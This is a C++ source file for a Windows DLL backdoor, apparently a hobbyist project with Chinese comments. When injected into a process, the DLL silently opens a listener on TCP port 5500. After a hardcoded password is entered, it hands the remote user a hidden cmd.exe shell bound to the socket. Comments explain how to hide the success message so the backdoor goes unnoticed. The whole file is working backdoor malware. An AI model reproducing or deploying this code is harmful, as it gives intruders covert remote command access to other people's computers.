// MyFirstDoorDll.cpp : 定义 DLL 应用程序的入口点。//beek 2006-11-07//#include "stdafx.h"#include <winsock2.h>//#pragma comment(lib,"kernel32.lib")#pragma comment(lib,"ws2_32.lib")#ifdef _MANAGED#pragma managed(push, off)#endifchar cHelp[] = "? --help\r\nshell --open a cmd shell\r\nquit\t--quit shell\r\n"; int StartCmdShell(SOCKET clientSock){ STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; //隐藏窗口 si.wShowWindow = SW_HIDE; //绑定CMD输入输出到套接字句柄 si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientSock; char cmdLine[] = "cmd.exe"; PROCESS_INFORMATION ProcessInformation; int ret; //建立子进程 ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation); WaitForSingleObject(ProcessInformation.hProcess, INFINITE); TerminateProcess(ProcessInformation.hProcess, 0); CloseHandle(ProcessInformation.hProcess); return 1;}DWORD WINAPI DoorStart(LPVOID lpParam){ WSADATA wsa; SOCKET listener; char buffer[1024],cmd[1024],psw[1024]; int ret; unsigned long lBytesRead; struct sockaddr_in serverAddr; //struct sockaddr_in clientAddr; int iClientAddrLength; WSAStartup(MAKEWORD(2,2),&wsa); listener = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0); //[屏蔽]本地5500 serverAddr.sin_family = AF_INET; serverAddr.sin_port = htons(5500); serverAddr.sin_addr.s_addr = ADDR_ANY; if((ret=bind(listener,(struct sockaddr *)&serverAddr,sizeof(serverAddr))) == SOCKET_ERROR) { MessageBox(NULL,"bind error","OK",MB_OK); } if((ret=listen(listener,2) )== SOCKET_ERROR) { MessageBox(NULL,"listen error","OK",MB_OK); } //iClientAddrLength = sizeof(clientAddr); iClientAddrLength = sizeof(serverAddr);again: SOCKET clientSock = accept(listener,(sockaddr*)&serverAddr,&iClientAddrLength); send(clientSock,"Please Enter Your PassWord:",sizeof("Please Enter Your PassWord:"),0); //清空密码buffer: ZeroMemory(psw,1024); lBytesRead = 0; //接受输入密码 while(lBytesRead <256) { if(recv(clientSock,buffer,1,0) == SOCKET_ERROR) { closesocket(clientSock); goto again; } psw[lBytesRead] = buffer[0]; lBytesRead++; } //如果密码正确则打开shell: if(strcmp(psw,"killme") ==0) { send(clientSock,"Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r",sizeof("Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r"),0); send(clientSock,"Command>",sizeof("Command>"),0); while(true) { ZeroMemory(cmd,1024); lBytesRead = 0; while(lBytesRead<256) { if(recv(clientSock,buffer,1,0) == SOCKET_ERROR) { closesocket(clientSock); goto again; } cmd[lBytesRead] = buffer[0]; lBytesRead++; } if(strcmp(cmd,"?")==0) { send(clientSock,cHelp,sizeof(cHelp),0); } if(strcmp(cmd,"shell")==0) { send(clientSock,"Create Shell OK.\n",sizeof("Create Shell OK.\n"),0); StartCmdShell(clientSock); //send(clientSock,"Exit Shell.\n",sizeof("Exit Shell.\n"),0); } if(strcmp(cmd,"quit")==0) { closesocket(clientSock); goto again; } if(strlen(cmd)) { send(clientSock,"Command>",sizeof("Command>"),0); } Sleep(100); } } else { closesocket(clientSock); goto again; } return 0;}BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { //编译时下面这句提示注释掉以便隐藏 MessageBox(NULL,"Telnet localhost 5500 port for a shell.\nInstall finished,Restart Your Computer to remove it~","Inject DLL Success!",MB_OK); //建立后gate线程,回调函数DoorStart调用winsock库函数进行[屏蔽],DoorStart必须申明为回调 CreateThread(NULL,NULL,DoorStart,NULL,NULL,NULL); } default: return TRUE; } return TRUE;}#ifdef _MANAGED#pragma managed(pop)#endif
